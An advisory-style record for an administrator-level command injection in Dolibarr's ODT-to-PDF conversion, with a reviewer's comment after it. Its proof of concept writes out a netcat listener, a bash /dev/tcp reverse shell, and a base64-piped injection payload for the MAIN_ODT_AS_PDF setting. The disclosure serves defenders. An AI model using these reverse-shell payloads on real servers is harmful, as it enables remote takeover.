+ "details": "### Summary\nAn authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the `MAIN_ODT_AS_PDF` configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the `exec()` function in the ODT to PDF conversion process.\n\n### Details\nThe vulnerability is located in `htdocs/includes/odtphp/odf.php`.\nWhen the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the `MAIN_ODT_AS_PDF` global setting.\n\nCode snippet (`htdocs/includes/odtphp/odf.php`, approx line 930):\n```php\n$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);\n// ...\nexec($command, $output_arr, $retval);\n```\n\nWhile the filename `$name` is sanitized using `escapeshellcmd()`, the configuration variable `MAIN_ODT_AS_PDF` is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like `;`) followed by arbitrary commands.\n\n### PoC\n**Prerequisites:**\n1. Login as an Administrator.\n2. Ensure the \"Commercial Proposals\" module is enabled and \"ODT templates\" are activated in its setup.\n\n**Steps to reproduce (Reverse Shell):**\n\n1. Start a netcat listener on the attacker's machine (IP: `172.26.0.1`, Port: `4445`):\n ```bash\n nc -lvnp 4445\n ```\n\n2. Prepare the payload. To avoid issues with special characters (like `&` or `>`) being escaped by the web application or shell, encode the reverse shell command in Base64:\n ```bash\n # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'\n echo \"bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'\" | base64\n # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK\n ```\n\n3. Navigate to **Home -> Setup -> Other Setup**.\n\n4. 
Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:\n ```bash\n jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash\n ```\n *(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*\n<img width=\"1898\" height=\"696\" alt=\"image\" src=\"https://github.com/user-attachments/assets/12e4aa61-eb9d-4342-bd03-9a1e824b8316\" />\n\n5. Navigate to **Commerce -> New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.\n<img width=\"1907\" height=\"668\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d790847e-50c1-47eb-994b-b2596b949242\" />\n<img width=\"1858\" height=\"346\" alt=\"image\" src=\"https://github.com/user-attachments/assets/afbeb170-d004-49d6-a395-1b4572fbf2e7\" />\n<img width=\"848\" height=\"183\" alt=\"image\" src=\"https://github.com/user-attachments/assets/93fbe6c9-96a8-4d0f-ad0e-4aea69f0fec1\" />\n\n6. Check the netcat listener. A connection will be established, granting a shell on the server:\n \n<img width=\"616\" height=\"193\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e90817da-9bb2-4fe1-8377-be10d8640e37\" />\n\n\n### Impact\n**Remote Code Execution (RCE).**\nAn attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:\n- Reading sensitive configuration files (database credentials).\n- Modifying application code.\n- Full system compromise depending on server configuration (e.g., docker escape, pivoting).\n\n---\n\n### Credits\nReported by Łukasz Rybak",
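Review bot: The Details section of this `details` string describes `$name` as "sanitized using `escapeshellcmd()`", which overstates what the quoted `odf.php` line does. `escapeshellcmd()` escapes shell metacharacters but does not quote the value as a single argument (that is the job of `escapeshellarg()`), so the text should say "escaped" and not suggest the filename is fully handled. In the same field, the step 4 explanation says `jodconverter` "satisfies the initial check", yet no such check appears in the quoted snippet; quote or describe it so the root cause is complete. The sections run Summary, Details, PoC, Impact, Credits with no remediation or workaround, which is what a consumer of this record needs. The `<img>` tags all carry `alt="image"`, so anyone reading the field as text gets nothing from them; give each screenshot a one-line description.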